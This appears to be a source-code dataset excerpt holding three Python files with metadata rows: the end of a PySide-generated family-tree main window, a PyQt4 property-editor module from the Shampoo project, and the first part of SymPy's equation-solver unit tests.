self.menuAbout.setTitle(QtGui.QApplication.translate("MainWindow", "About", None, QtGui.QApplication.UnicodeUTF8))
self.actionNew_Person.setText(QtGui.QApplication.translate("MainWindow", "New Person", None, QtGui.QApplication.UnicodeUTF8))
self.actionNew_Relationship.setText(QtGui.QApplication.translate("MainWindow", "New Relationship", None, QtGui.QApplication.UnicodeUTF8))
self.actionEdit_Person.setText(QtGui.QApplication.translate("MainWindow", "Edit Person", None, QtGui.QApplication.UnicodeUTF8))
self.actionEdit_Relationship.setText(QtGui.QApplication.translate("MainWindow", "Edit Relationship", None, QtGui.QApplication.UnicodeUTF8))
self.actionSave_Tree.setText(QtGui.QApplication.translate("MainWindow", "Save Tree", None, QtGui.QApplication.UnicodeUTF8))
self.actionLoad_Tree.setText(QtGui.QApplication.translate("MainWindow", "Load Tree", None, QtGui.QApplication.UnicodeUTF8))
self.actionNew_Tree.setText(QtGui.QApplication.translate("MainWindow", "New Tree", None, QtGui.QApplication.UnicodeUTF8))
self.actionExit.setText(QtGui.QApplication.translate("MainWindow", "Exit", None, QtGui.QApplication.UnicodeUTF8))
self.actionDescendants.setText(QtGui.QApplication.translate("MainWindow", "Descendants", None, QtGui.QApplication.UnicodeUTF8))
self.actionHourglass.setText(QtGui.QApplication.translate("MainWindow", "Hourglass", None, QtGui.QApplication.UnicodeUTF8))
self.actionPython.setText(QtGui.QApplication.translate("MainWindow", "Python", None, QtGui.QApplication.UnicodeUTF8))
self.actionPyside.setText(QtGui.QApplication.translate("MainWindow", "Pyside", None, QtGui.QApplication.UnicodeUTF8))
self.actionFamily_Tree.setText(QtGui.QApplication.translate("MainWindow", "Family Tree", None, QtGui.QApplication.UnicodeUTF8))
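# Hedged usage sketch: the conventional driver for a pyside-uic module. The
# generated class above is meant to be imported, not edited, so in practice
# this block would live in a separate launcher script.
if __name__ == "__main__":
    import sys
    app = QtGui.QApplication(sys.argv)
    window = QtGui.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(window)   # builds the widgets and menus defined above
    window.show()
    sys.exit(app.exec_())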
|
cc0-1.0
| -3,483,384,771,466,825,000
| 62.347458
| 147
| 0.734849
| false
| 4.082469
| false
| false
| false
|
spirali/shampoo
|
src/ui/editor.py
|
1
|
6904
|
#
# Copyright (C) 2014 Stanislav Bohm
#
# This file is part of Shampoo.
#
# Shampoo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# Shampoo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Shampoo. If not, see <http://www.gnu.org/licenses/>.
#
from base.pointers import make_pointer
from PyQt4.QtGui import QLineEdit, \
QFormLayout, \
QDoubleValidator, \
QGroupBox, \
QSpinBox, \
QHBoxLayout, \
QRegExpValidator, \
QComboBox, \
QCheckBox
import PyQt4.QtCore as QtCore
import logging
class EditorBase:
set_text = False
class FloatEditor(EditorBase):
def make_widget(self, pointer):
def value_changed(value):
try:
f = float(value)
except ValueError:
logging.debug("Float editor: Invalid value")
return
pointer.set(f)
widget = QLineEdit(str(pointer.get()))
widget.setValidator(QDoubleValidator())
widget.textEdited.connect(value_changed)
return widget
class StringEditor(EditorBase):
def __init__(self, regex=None, identifier=False):
if identifier:
assert not regex
regex=r'^[A-Za-z_][A-Za-z_\d]*$'
if regex:
self.regex = QtCore.QRegExp(regex)
else:
self.regex = None
def make_widget(self, pointer):
def value_changed(value):
pointer.set(value)
widget = QLineEdit(str(pointer.get()))
if self.regex is not None:
validator = QRegExpValidator(self.regex)
widget.setValidator(validator)
widget.textEdited.connect(value_changed)
return widget
class IntEditor(EditorBase):
def __init__(self, min_value, max_value):
self.min_value = min_value
self.max_value = max_value
def make_widget(self, pointer):
def value_changed(value):
pointer.set(value)
widget = QSpinBox()
widget.setMinimum(self.min_value)
widget.setMaximum(self.max_value)
widget.setValue(pointer.get())
widget.valueChanged.connect(value_changed)
return widget
class BoolEditor(EditorBase):
set_text = True
def __init__(self):
pass
    def make_widget(self, pointer):
        def value_changed(value):
            pointer.set(value)
        widget = QCheckBox()
        widget.setChecked(bool(pointer.get()))
        # QCheckBox has no valueChanged signal; toggled delivers the bool state
        widget.toggled.connect(value_changed)
        return widget
class ChooseEditor(EditorBase):
def __init__(self, options):
self.options = options
    def make_widget(self, pointer):
        values = [value for name, value in self.options]
        def value_changed(index):
            pointer.set(values[index])
        widget = QComboBox()
        for name, value in self.options:
            widget.addItem(name)
        widget.setCurrentIndex(values.index(pointer.get()))
        # propagate combo selection changes back to the edited attribute
        widget.currentIndexChanged.connect(value_changed)
        return widget
class VertexEditor(EditorBase):
def __init__(self):
pass
def make_widget(self, pointer):
def value_changed():
try:
value_x = float(x.text())
value_y = float(y.text())
value_z = float(z.text())
except ValueError:
logging.debug("Float editor: Invalid value")
return
pointer.set((value_x, value_y, value_z))
vertex = pointer.get()
layout = QHBoxLayout()
x = QLineEdit(str(vertex[0]))
x.setValidator(QDoubleValidator())
x.textEdited.connect(value_changed)
layout.addWidget(x)
y = QLineEdit(str(vertex[1]))
y.setValidator(QDoubleValidator())
y.textEdited.connect(value_changed)
layout.addWidget(y)
z = QLineEdit(str(vertex[2]))
z.setValidator(QDoubleValidator())
z.textEdited.connect(value_changed)
layout.addWidget(z)
return layout
class Group:
def __init__(self, name):
self.name = name
self.items = []
def add(self, editor, name, attr, update_method):
self.items.append((editor, name, attr, update_method))
def make_widget(self, owner, layout):
def add_row(editor, name, attr, update_method):
if update_method:
update_callback = lambda: getattr(owner, update_method)()
else:
update_callback = None
pointer = make_pointer(owner, attr, update_callback)
widget = editor.make_widget(pointer)
if editor.set_text:
widget.setText(name)
form_layout.addRow(widget)
else:
form_layout.addRow(name, widget)
form_layout = QFormLayout()
        box = QGroupBox(self.name)
layout.addWidget(box)
box.setLayout(form_layout)
for editor, name, attr, update_method in self.items:
add_row(editor, name, attr, update_method)
def add_float(self, name, attr, update_method="update"):
self.add(FloatEditor(), name, attr, update_method)
def add_int(self, name, attr, update_method="update", *args, **kw):
self.add(IntEditor(*args, **kw), name, attr, update_method)
def add_bool(self, name, attr, update_method="update", *args, **kw):
self.add(BoolEditor(*args, **kw), name, attr, update_method)
def add_vertex(self, name, attr, update_method="update", *args, **kw):
self.add(VertexEditor(*args, **kw), name, attr, update_method)
def add_string(self, name, attr, update_method="update", *args, **kw):
self.add(StringEditor(*args, **kw), name, attr, update_method)
def add_choose(self, name, attr, update_method="update", *args, **kw):
self.add(ChooseEditor(*args, **kw), name, attr, update_method)
class EditorBuilder:
def __init__(self):
self.groups = []
def add_group(self, name):
group = Group(name)
self.groups.append(group)
return group
"""
last = self.groups[-1]
if last.name is None and not last.items:
# Last group is empty default group, so we can remove it
self.groups = [ Group ]
else:
self.groups.append(group)
"""
def build(self, owner, layout):
for group in self.groups:
group.make_widget(owner, layout)
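# Hedged usage sketch: Sphere and its attributes are illustrative, not part
# of Shampoo's real model classes. It shows how the builder above is driven:
# each add_* call registers an editor for an attribute of the owner object,
# which make_pointer exposes to the widgets as a get/set pair.
if __name__ == "__main__":
    import sys
    from PyQt4.QtGui import QApplication, QWidget, QVBoxLayout
    class Sphere(object):
        def __init__(self):
            self.radius = 1.0
            self.center = (0.0, 0.0, 0.0)
        def update(self):
            pass  # a real model would trigger a redraw here
    app = QApplication(sys.argv)
    panel = QWidget()
    layout = QVBoxLayout(panel)
    builder = EditorBuilder()
    group = builder.add_group("Sphere")
    group.add_float("Radius", "radius")
    group.add_vertex("Center", "center")
    builder.build(Sphere(), layout)
    panel.show()
    sys.exit(app.exec_())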
|
gpl-3.0
| 8,687,659,416,699,172,000
| 28.630901
| 74
| 0.581547
| false
| 4.006965
| false
| false
| false
|
alephu5/Soundbyte
|
environment/lib/python3.3/site-packages/sympy/solvers/tests/test_solvers.py
|
1
|
55773
|
from sympy import (
Abs, And, Derivative, Dummy, Eq, Float, Function, Gt, I, Integral,
LambertW, Lt, Matrix, Or, Piecewise, Poly, Q, Rational, S, Symbol,
Wild, acos, asin, atan, atanh, cos, cosh, diff, erf, erfinv, erfc,
erfcinv, erf2, erf2inv, exp, expand, im, log, pi, re, sec, sin,
sinh, solve, solve_linear, sqrt, sstr, symbols, sympify, tan, tanh,
root, simplify, atan2, arg, Mul, SparseMatrix)
from sympy.core.function import nfloat
from sympy.solvers import solve_linear_system, solve_linear_system_LU, \
solve_undetermined_coeffs
from sympy.solvers.solvers import _invert, unrad, checksol, posify, _ispow, \
det_quick, det_perm, det_minor
from sympy.polys.rootoftools import RootOf
from sympy.utilities.pytest import slow, XFAIL, raises, skip
from sympy.utilities.randtest import test_numerically as tn
from sympy.abc import a, b, c, d, k, h, p, x, y, z, t, q, m
def NS(e, n=15, **options):
return sstr(sympify(e).evalf(n, **options), full_prec=True)
def test_swap_back():
f, g = map(Function, 'fg')
fx, gx = f(x), g(x)
assert solve([fx + y - 2, fx - gx - 5], fx, y, gx) == \
{fx: gx + 5, y: -gx - 3}
assert solve(fx + gx*x - 2, [fx, gx]) == {fx: 2, gx: 0}
assert solve(fx + gx**2*x - y, [fx, gx]) == [{fx: y - gx**2*x}]
assert solve([f(1) - 2, x + 2]) == [{x: -2, f(1): 2}]
def guess_solve_strategy(eq, symbol):
try:
solve(eq, symbol)
return True
except (TypeError, NotImplementedError):
return False
def test_guess_poly():
# polynomial equations
assert guess_solve_strategy( S(4), x ) # == GS_POLY
assert guess_solve_strategy( x, x ) # == GS_POLY
assert guess_solve_strategy( x + a, x ) # == GS_POLY
assert guess_solve_strategy( 2*x, x ) # == GS_POLY
assert guess_solve_strategy( x + sqrt(2), x) # == GS_POLY
assert guess_solve_strategy( x + 2**Rational(1, 4), x) # == GS_POLY
assert guess_solve_strategy( x**2 + 1, x ) # == GS_POLY
assert guess_solve_strategy( x**2 - 1, x ) # == GS_POLY
assert guess_solve_strategy( x*y + y, x ) # == GS_POLY
assert guess_solve_strategy( x*exp(y) + y, x) # == GS_POLY
assert guess_solve_strategy(
(x - y**3)/(y**2*sqrt(1 - y**2)), x) # == GS_POLY
def test_guess_poly_cv():
# polynomial equations via a change of variable
assert guess_solve_strategy( sqrt(x) + 1, x ) # == GS_POLY_CV_1
assert guess_solve_strategy(
x**Rational(1, 3) + sqrt(x) + 1, x ) # == GS_POLY_CV_1
assert guess_solve_strategy( 4*x*(1 - sqrt(x)), x ) # == GS_POLY_CV_1
    # polynomial equation obtained by multiplying both sides by x**n
assert guess_solve_strategy( x + 1/x + y, x ) # == GS_POLY_CV_2
def test_guess_rational_cv():
# rational functions
assert guess_solve_strategy( (x + 1)/(x**2 + 2), x) # == GS_RATIONAL
assert guess_solve_strategy(
(x - y**3)/(y**2*sqrt(1 - y**2)), y) # == GS_RATIONAL_CV_1
# rational functions via the change of variable y -> x**n
assert guess_solve_strategy( (sqrt(x) + 1)/(x**Rational(1, 3) + sqrt(x) + 1), x ) \
#== GS_RATIONAL_CV_1
def test_guess_transcendental():
    # transcendental functions
assert guess_solve_strategy( exp(x) + 1, x ) # == GS_TRANSCENDENTAL
assert guess_solve_strategy( 2*cos(x) - y, x ) # == GS_TRANSCENDENTAL
assert guess_solve_strategy(
exp(x) + exp(-x) - y, x ) # == GS_TRANSCENDENTAL
assert guess_solve_strategy(3**x - 10, x) # == GS_TRANSCENDENTAL
assert guess_solve_strategy(-3**x + 10, x) # == GS_TRANSCENDENTAL
assert guess_solve_strategy(a*x**b - y, x) # == GS_TRANSCENDENTAL
def test_solve_args():
# implicit symbol to solve for
assert set(solve(x**2 - 4)) == set([S(2), -S(2)])
assert solve([x + y - 3, x - y - 5]) == {x: 4, y: -1}
assert solve(x - exp(x), x, implicit=True) == [exp(x)]
# no symbol to solve for
assert solve(42) == []
assert solve([1, 2]) == []
# duplicate symbols removed
assert solve((x - 3, y + 2), x, y, x) == {x: 3, y: -2}
# unordered symbols
# only 1
assert solve(y - 3, set([y])) == [3]
# more than 1
assert solve(y - 3, set([x, y])) == [{y: 3}]
# multiple symbols: take the first linear solution
assert solve(x + y - 3, [x, y]) == [{x: 3 - y}]
# unless it is an undetermined coefficients system
assert solve(a + b*x - 2, [a, b]) == {a: 2, b: 0}
assert solve(a*x**2 + b*x + c -
((x - h)**2 + 4*p*k)/4/p,
[h, p, k], exclude=[a, b, c], dict=True) == \
[{k: (4*a*c - b**2)/(4*a), h: -b/(2*a), p: 1/(4*a)}]
# failing undetermined system
assert solve(a*x + b**2/(x + 4) - 3*x - 4/x, a, b) == \
[{a: (-b**2*x + 3*x**3 + 12*x**2 + 4*x + 16)/(x**2*(x + 4))}]
# failed single equation
assert solve(1/(1/x - y + exp(y))) == []
raises(
NotImplementedError, lambda: solve(exp(x) + sin(x) + exp(y) + sin(y)))
# failed system
# -- when no symbols given, 1 fails
assert solve([y, exp(x) + x]) == [{x: -LambertW(1), y: 0}]
# both fail
assert solve(
(exp(x) - x, exp(y) - y)) == [{x: -LambertW(-1), y: -LambertW(-1)}]
# -- when symbols given
    assert solve([y, exp(x) + x], x, y) == [(-LambertW(1), 0)]
# symbol is a number
assert solve(x**2 - pi, pi) == [x**2]
# no equations
assert solve([], [x]) == []
# overdetermined system
# - nonlinear
assert solve([(x + y)**2 - 4, x + y - 2]) == [{x: -y + 2}]
# - linear
assert solve((x + y - 2, 2*x + 2*y - 4)) == {x: -y + 2}
def test_solve_polynomial1():
assert solve(3*x - 2, x) == [Rational(2, 3)]
assert solve(Eq(3*x, 2), x) == [Rational(2, 3)]
assert set(solve(x**2 - 1, x)) == set([-S(1), S(1)])
assert set(solve(Eq(x**2, 1), x)) == set([-S(1), S(1)])
assert solve(x - y**3, x) == [y**3]
assert set(solve(x - y**3, y)) == set([
(-x**Rational(1, 3))/2 + I*sqrt(3)*x**Rational(1, 3)/2,
x**Rational(1, 3),
(-x**Rational(1, 3))/2 - I*sqrt(3)*x**Rational(1, 3)/2,
])
a11, a12, a21, a22, b1, b2 = symbols('a11,a12,a21,a22,b1,b2')
assert solve([a11*x + a12*y - b1, a21*x + a22*y - b2], x, y) == \
{
x: (a22*b1 - a12*b2)/(a11*a22 - a12*a21),
y: (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
}
solution = {y: S.Zero, x: S.Zero}
assert solve((x - y, x + y), x, y ) == solution
assert solve((x - y, x + y), (x, y)) == solution
assert solve((x - y, x + y), [x, y]) == solution
assert set(solve(x**3 - 15*x - 4, x)) == set([
-2 + 3**Rational(1, 2),
S(4),
-2 - 3**Rational(1, 2)
])
assert set(solve((x**2 - 1)**2 - a, x)) == \
set([sqrt(1 + sqrt(a)), -sqrt(1 + sqrt(a)),
sqrt(1 - sqrt(a)), -sqrt(1 - sqrt(a))])
def test_solve_polynomial2():
assert solve(4, x) == []
def test_solve_polynomial_cv_1a():
"""
    Test for solving equations that can be converted to a polynomial equation
    using the change of variable y -> x**Rational(p, q)
"""
assert solve( sqrt(x) - 1, x) == [1]
assert solve( sqrt(x) - 2, x) == [4]
assert solve( x**Rational(1, 4) - 2, x) == [16]
assert solve( x**Rational(1, 3) - 3, x) == [27]
assert solve(sqrt(x) + x**Rational(1, 3) + x**Rational(1, 4), x) == [0]
def test_solve_polynomial_cv_1b():
assert set(solve(4*x*(1 - a*sqrt(x)), x)) == set([S(0), 1/a**2])
assert set(solve(x * (x**(S(1)/3) - 3), x)) == set([S(0), S(27)])
def test_solve_polynomial_cv_2():
"""
    Test for solving equations that can be converted to a polynomial equation
    by multiplying both sides of the equation by x**m
"""
assert solve(x + 1/x - 1, x) in \
[[ Rational(1, 2) + I*sqrt(3)/2, Rational(1, 2) - I*sqrt(3)/2],
[ Rational(1, 2) - I*sqrt(3)/2, Rational(1, 2) + I*sqrt(3)/2]]
def test_quintics_1():
f = x**5 - 110*x**3 - 55*x**2 + 2310*x + 979
s = solve(f, check=False)
for root in s:
res = f.subs(x, root.n()).n()
assert tn(res, 0)
f = x**5 - 15*x**3 - 5*x**2 + 10*x + 20
s = solve(f)
for root in s:
assert root.func == RootOf
# if one uses solve to get the roots of a polynomial that has a RootOf
# solution, make sure that the use of nfloat during the solve process
# doesn't fail. Note: if you want numerical solutions to a polynomial
# it is *much* faster to use nroots to get them than to solve the
# equation only to get RootOf solutions which are then numerically
# evaluated. So for eq = x**5 + 3*x + 7 do Poly(eq).nroots() rather
# than [i.n() for i in solve(eq)] to get the numerical roots of eq.
assert nfloat(solve(x**5 + 3*x**3 + 7)[0], exponent=False) == \
RootOf(x**5 + 3*x**3 + 7, 0).n()
def test_highorder_poly():
# just testing that the uniq generator is unpacked
sol = solve(x**6 - 2*x + 2)
assert all(isinstance(i, RootOf) for i in sol) and len(sol) == 6
@XFAIL
@slow
def test_quintics_2():
f = x**5 + 15*x + 12
s = solve(f, check=False)
for root in s:
res = f.subs(x, root.n()).n()
assert tn(res, 0)
f = x**5 - 15*x**3 - 5*x**2 + 10*x + 20
s = solve(f)
for root in s:
assert root.func == RootOf
def test_solve_rational():
"""Test solve for rational functions"""
assert solve( ( x - y**3 )/( (y**2)*sqrt(1 - y**2) ), x) == [y**3]
def test_solve_nonlinear():
assert solve(x**2 - y**2, x, y) == [{x: -y}, {x: y}]
assert solve(x**2 - y**2/exp(x), x, y) == [{x: 2*LambertW(y/2)}]
assert solve(x**2 - y**2/exp(x), y, x) == [{y: -x*exp(x/2)}, {y: x*exp(x/2)}]
def test_issue_4129():
assert solve(4**(2*(x**2) + 2*x) - 8, x) == [-Rational(3, 2), S.Half]
def test_issue_4091():
assert solve(log(x-3) + log(x+3), x) == [sqrt(10)]
def test_linear_system():
x, y, z, t, n = symbols('x, y, z, t, n')
assert solve([x - 1, x - y, x - 2*y, y - 1], [x, y]) == []
assert solve([x - 1, x - y, x - 2*y, x - 1], [x, y]) == []
assert solve([x - 1, x - 1, x - y, x - 2*y], [x, y]) == []
assert solve([x + 5*y - 2, -3*x + 6*y - 15], x, y) == {x: -3, y: 1}
M = Matrix([[0, 0, n*(n + 1), (n + 1)**2, 0],
[n + 1, n + 1, -2*n - 1, -(n + 1), 0],
[-1, 0, 1, 0, 0]])
assert solve_linear_system(M, x, y, z, t) == \
{x: -t - t/n, z: -t - t/n, y: 0}
assert solve([x + y + z + t, -z - t], x, y, z, t) == {x: -y, z: -t}
def test_linear_system_function():
a = Function('a')
assert solve([a(0, 0) + a(0, 1) + a(1, 0) + a(1, 1), -a(1, 0) - a(1, 1)],
a(0, 0), a(0, 1), a(1, 0), a(1, 1)) == {a(1, 0): -a(1, 1), a(0, 0): -a(0, 1)}
def test_linear_systemLU():
n = Symbol('n')
M = Matrix([[1, 2, 0, 1], [1, 3, 2*n, 1], [4, -1, n**2, 1]])
assert solve_linear_system_LU(M, [x, y, z]) == {z: -3/(n**2 + 18*n),
x: 1 - 12*n/(n**2 + 18*n),
y: 6*n/(n**2 + 18*n)}
# Note: multiple solutions exist for some of these equations, so the tests
# should be expected to break if the implementation of the solver changes
# in such a way that a different branch is chosen
def test_tsolve():
assert solve(exp(x) - 3, x) == [log(3)]
assert set(solve((a*x + b)*(exp(x) - 3), x)) == set([-b/a, log(3)])
assert solve(cos(x) - y, x) == [-acos(y) + 2*pi, acos(y)]
assert solve(2*cos(x) - y, x) == [-acos(y/2) + 2*pi, acos(y/2)]
assert solve(Eq(cos(x), sin(x)), x) == [-3*pi/4, pi/4]
assert set(solve(exp(x) + exp(-x) - y, x)) in [set([
log(y/2 - sqrt(y**2 - 4)/2),
log(y/2 + sqrt(y**2 - 4)/2),
]), set([
log(y - sqrt(y**2 - 4)) - log(2),
log(y + sqrt(y**2 - 4)) - log(2)]),
set([
log(y/2 - sqrt((y - 2)*(y + 2))/2),
log(y/2 + sqrt((y - 2)*(y + 2))/2)])]
assert solve(exp(x) - 3, x) == [log(3)]
assert solve(Eq(exp(x), 3), x) == [log(3)]
assert solve(log(x) - 3, x) == [exp(3)]
assert solve(sqrt(3*x) - 4, x) == [Rational(16, 3)]
assert solve(3**(x + 2), x) == []
assert solve(3**(2 - x), x) == []
assert solve(x + 2**x, x) == [-LambertW(log(2))/log(2)]
ans = solve(3*x + 5 + 2**(-5*x + 3), x)
assert len(ans) == 1 and ans[0].expand() == \
-Rational(5, 3) + LambertW(-10240*2**(S(1)/3)*log(2)/3)/(5*log(2))
assert solve(5*x - 1 + 3*exp(2 - 7*x), x) == \
[Rational(1, 5) + LambertW(-21*exp(Rational(3, 5))/5)/7]
assert solve(2*x + 5 + log(3*x - 2), x) == \
[Rational(2, 3) + LambertW(2*exp(-Rational(19, 3))/3)/2]
assert solve(3*x + log(4*x), x) == [LambertW(Rational(3, 4))/3]
assert set(solve((2*x + 8)*(8 + exp(x)), x)) == set([S(-4), log(8) + pi*I])
eq = 2*exp(3*x + 4) - 3
ans = solve(eq, x) # this generated a failure in flatten
assert len(ans) == 3 and all(eq.subs(x, a).n(chop=True) == 0 for a in ans)
assert solve(2*log(3*x + 4) - 3, x) == [(exp(Rational(3, 2)) - 4)/3]
assert solve(exp(x) + 1, x) == [pi*I]
eq = 2*(3*x + 4)**5 - 6*7**(3*x + 9)
result = solve(eq, x)
ans = [(log(2401) + 5*LambertW(-log(7**(7*3**Rational(1, 5)/5))))/(3*log(7))/-1]
assert result == ans
# it works if expanded, too
assert solve(eq.expand(), x) == result
assert solve(z*cos(x) - y, x) == [-acos(y/z) + 2*pi, acos(y/z)]
assert solve(z*cos(2*x) - y, x) == [-acos(y/z)/2 + pi, acos(y/z)/2]
assert solve(z*cos(sin(x)) - y, x) == [
asin(acos(y/z) - 2*pi) + pi, -asin(acos(y/z)) + pi,
-asin(acos(y/z) - 2*pi), asin(acos(y/z))]
assert solve(z*cos(x), x) == [pi/2, 3*pi/2]
# issue #1409
assert solve(y - b*x/(a + x), x) in [[-a*y/(y - b)], [a*y/(b - y)]]
assert solve(y - b*exp(a/x), x) == [a/log(y/b)]
# issue #1408
assert solve(y - b/(1 + a*x), x) in [[(b - y)/(a*y)], [-((y - b)/(a*y))]]
# issue #1407
assert solve(y - a*x**b, x) == [(y/a)**(1/b)]
# issue #1406
assert solve(z**x - y, x) == [log(y)/log(z)]
# issue #1405
assert solve(2**x - 10, x) == [log(10)/log(2)]
# issue #3645
assert solve(x*y) == [{x: 0}, {y: 0}]
assert solve([x*y]) == [{x: 0}, {y: 0}]
assert solve(x**y - 1) == [{x: 1}, {y: 0}]
assert solve([x**y - 1]) == [{x: 1}, {y: 0}]
assert solve(x*y*(x**2 - y**2)) == [{x: 0}, {x: -y}, {x: y}, {y: 0}]
assert solve([x*y*(x**2 - y**2)]) == [{x: 0}, {x: -y}, {x: y}, {y: 0}]
#issue #1640
assert solve(exp(log(5)*x) - 2**x, x) == [0]
def test_solve_for_functions_derivatives():
t = Symbol('t')
x = Function('x')(t)
y = Function('y')(t)
a11, a12, a21, a22, b1, b2 = symbols('a11,a12,a21,a22,b1,b2')
soln = solve([a11*x + a12*y - b1, a21*x + a22*y - b2], x, y)
assert soln == {
x: (a22*b1 - a12*b2)/(a11*a22 - a12*a21),
y: (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
}
assert solve(x - 1, x) == [1]
assert solve(3*x - 2, x) == [Rational(2, 3)]
soln = solve([a11*x.diff(t) + a12*y.diff(t) - b1, a21*x.diff(t) +
a22*y.diff(t) - b2], x.diff(t), y.diff(t))
assert soln == { y.diff(t): (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x.diff(t): (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
assert solve(x.diff(t) - 1, x.diff(t)) == [1]
assert solve(3*x.diff(t) - 2, x.diff(t)) == [Rational(2, 3)]
eqns = set((3*x - 1, 2*y - 4))
assert solve(eqns, set((x, y))) == { x: Rational(1, 3), y: 2 }
x = Symbol('x')
f = Function('f')
F = x**2 + f(x)**2 - 4*x - 1
assert solve(F.diff(x), diff(f(x), x)) == [(-x + 2)/f(x)]
# Mixed cased with a Symbol and a Function
x = Symbol('x')
y = Function('y')(t)
soln = solve([a11*x + a12*y.diff(t) - b1, a21*x +
a22*y.diff(t) - b2], x, y.diff(t))
assert soln == { y.diff(t): (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x: (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
def test_issue626():
f = Function('f')
F = x**2 + f(x)**2 - 4*x - 1
e = F.diff(x)
assert solve(e, f(x).diff(x)) in [[(2 - x)/f(x)], [-((x - 2)/f(x))]]
def test_issue771():
a, b, c, d = symbols('a b c d')
A = Matrix(2, 2, [a, b, c, d])
B = Matrix(2, 2, [0, 2, -3, 0])
C = Matrix(2, 2, [1, 2, 3, 4])
assert solve(A*B - C, [a, b, c, d]) == {a: 1, b: -S(1)/3, c: 2, d: -1}
assert solve([A*B - C], [a, b, c, d]) == {a: 1, b: -S(1)/3, c: 2, d: -1}
assert solve(Eq(A*B, C), [a, b, c, d]) == {a: 1, b: -S(1)/3, c: 2, d: -1}
assert solve([A*B - B*A], [a, b, c, d]) == {a: d, b: -S(2)/3*c}
assert solve([A*C - C*A], [a, b, c, d]) == {a: d - c, b: S(2)/3*c}
assert solve([A*B - B*A, A*C - C*A], [a, b, c, d]) == {a: d, b: 0, c: 0}
assert solve([Eq(A*B, B*A)], [a, b, c, d]) == {a: d, b: -S(2)/3*c}
assert solve([Eq(A*C, C*A)], [a, b, c, d]) == {a: d - c, b: S(2)/3*c}
assert solve([Eq(A*B, B*A), Eq(A*C, C*A)], [a, b, c, d]) == {a: d, b: 0, c: 0}
def test_solve_linear():
w = Wild('w')
assert solve_linear(x, x) == (0, 1)
assert solve_linear(x, y - 2*x) in [(x, y/3), (y, 3*x)]
assert solve_linear(x, y - 2*x, exclude=[x]) == (y, 3*x)
assert solve_linear(3*x - y, 0) in [(x, y/3), (y, 3*x)]
assert solve_linear(3*x - y, 0, [x]) == (x, y/3)
assert solve_linear(3*x - y, 0, [y]) == (y, 3*x)
assert solve_linear(x**2/y, 1) == (y, x**2)
assert solve_linear(w, x) in [(w, x), (x, w)]
assert solve_linear(cos(x)**2 + sin(x)**2 + 2 + y) == \
(y, -2 - cos(x)**2 - sin(x)**2)
assert solve_linear(cos(x)**2 + sin(x)**2 + 2 + y, symbols=[x]) == (0, 1)
assert solve_linear(Eq(x, 3)) == (x, 3)
assert solve_linear(1/(1/x - 2)) == (0, 0)
assert solve_linear((x + 1)*exp(-x), symbols=[x]) == (x + 1, exp(x))
assert solve_linear((x + 1)*exp(x), symbols=[x]) == ((x + 1)*exp(x), 1)
assert solve_linear(x*exp(-x**2), symbols=[x]) == (0, 0)
raises(ValueError, lambda: solve_linear(Eq(x, 3), 3))
def test_solve_undetermined_coeffs():
assert solve_undetermined_coeffs(a*x**2 + b*x**2 + b*x + 2*c*x + c + 1, [a, b, c], x) == \
{a: -2, b: 2, c: -1}
# Test that rational functions work
assert solve_undetermined_coeffs(a/x + b/(x + 1) - (2*x + 1)/(x**2 + x), [a, b], x) == \
{a: 1, b: 1}
# Test cancellation in rational functions
assert solve_undetermined_coeffs(((c + 1)*a*x**2 + (c + 1)*b*x**2 +
(c + 1)*b*x + (c + 1)*2*c*x + (c + 1)**2)/(c + 1), [a, b, c], x) == \
{a: -2, b: 2, c: -1}
def test_solve_inequalities():
system = [Lt(x**2 - 2, 0), Gt(x**2 - 1, 0)]
assert solve(system) == \
And(Or(And(Lt(-sqrt(2), re(x)), Lt(re(x), -1)),
And(Lt(1, re(x)), Lt(re(x), sqrt(2)))), Eq(im(x), 0))
assert solve(system, assume=Q.real(x)) == \
Or(And(Lt(-sqrt(2), x), Lt(x, -1)), And(Lt(1, x), Lt(x, sqrt(2))))
# issue 3528, 3448
assert solve((x - 3)/(x - 2) < 0, x, assume=Q.real(x)) == And(Lt(2, x), Lt(x, 3))
assert solve(x/(x + 1) > 1, x, assume=Q.real(x)) == Lt(x, -1)
def test_issue_1694():
assert solve(1/x) == []
assert solve(x*(1 - 5/x)) == [5]
assert solve(x + sqrt(x) - 2) == [1]
assert solve(-(1 + x)/(2 + x)**2 + 1/(2 + x)) == []
assert solve(-x**2 - 2*x + (x + 1)**2 - 1) == []
assert solve((x/(x + 1) + 3)**(-2)) == []
assert solve(x/sqrt(x**2 + 1), x) == [0]
assert solve(exp(x) - y, x) == [log(y)]
assert solve(exp(x)) == []
assert solve(x**2 + x + sin(y)**2 + cos(y)**2 - 1, x) in [[0, -1], [-1, 0]]
eq = 4*3**(5*x + 2) - 7
ans = solve(eq, x)
assert len(ans) == 5 and all(eq.subs(x, a).n(chop=True) == 0 for a in ans)
assert solve(log(x**2) - y**2/exp(x), x, y, set=True) == \
([y], set([
(-sqrt(exp(x)*log(x**2)),),
(sqrt(exp(x)*log(x**2)),)]))
assert solve(x**2*z**2 - z**2*y**2) == [{x: -y}, {x: y}, {z: 0}]
assert solve((x - 1)/(1 + 1/(x - 1))) == []
assert solve(x**(y*z) - x, x) == [1]
raises(NotImplementedError, lambda: solve(log(x) - exp(x), x))
raises(NotImplementedError, lambda: solve(2**x - exp(x) - 3))
def test_PR1964():
# 2072
assert solve(sqrt(x)) == solve(sqrt(x**3)) == [0]
assert solve(sqrt(x - 1)) == [1]
# 1363
a = Symbol('a')
assert solve(-3*a/sqrt(x), x) == []
# 1387
assert solve(2*x/(x + 2) - 1, x) == [2]
# 1397
assert set(solve((x**2/(7 - x)).diff(x))) == set([S(0), S(14)])
# 1596
f = Function('f')
assert solve((3 - 5*x/f(x))*f(x), f(x)) == [5*x/3]
# 1398
assert solve(1/(5 + x)**(S(1)/5) - 9, x) == [-295244/S(59049)]
assert solve(sqrt(x) + sqrt(sqrt(x)) - 4) == [-9*sqrt(17)/2 + 49*S.Half]
